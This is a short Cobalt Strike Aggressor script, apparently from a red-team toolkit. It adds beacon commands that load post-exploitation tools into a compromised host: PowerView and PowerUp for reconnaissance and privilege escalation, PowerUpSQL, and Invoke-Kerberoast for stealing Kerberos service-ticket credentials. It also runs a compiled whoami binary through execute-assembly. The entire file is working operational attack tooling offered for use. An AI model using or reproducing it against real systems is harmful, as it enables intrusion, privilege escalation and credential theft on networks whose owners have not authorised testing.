#### Load PowerShells
## Aggressor script to simplify importing powershell scripts using powershll-import  
###  Author: Sabri (@KINGSABRI)

### Usage ###
# 1. Modify/Add your script pathes in global variable section
# 2. Import into Cobalt Strike
# 3. From beacon try
#     beacon> load_powerview
#     beacon> load_powerup
#     beacon> load_powerupsql
#     beacon> whoami

### Output ###
# powershell-import task gets exected

### Global variables section
$powerview_path  = "/root/rt/post/PowerShells/PowerView.ps1";
$powerup_path    = "/root/rt/post/PowerShells/PowerUp.ps1";
$powerupsql_path = "/root/rt/post/PowerShells/PowerUpSQL/PowerUpSQL.ps1";
$kerberoast_path = "/root/rt/post/PowerShells/Invoke-Kerberoast.ps1";
$whoami_path     = "/root/rt/post/Red-Teaming-Compiled/SharpSploit/whoami.exe";
### 

sub load_ps_script
{
    $bid    = $1;
    $file   = $2;

    binput($1, "powershell_import $file");
	bpowershell_import($bid, $file);
}

sub load_bin_script
{
    $bid    = $1;
    $file   = $2;
    $params = $3;

    binput($1, "execute-assembly $2");
	bexecute_assembly($bid, $file, $params);
}


#
# PowerShells
#
alias load_powerview {
	load_ps_script($1, $powerview_path);
}

alias load_powerup {
	load_ps_script($1, $powerup_path);
}

alias load_powerupsql {
	load_ps_script($1, $powerupsql_path);
}

alias load_kerberoast {
	load_ps_script($1, $kerberoast_path);
}


#
# Binaries
#
alias whoami {
	load_bin_script($1, $whoami_path);
}
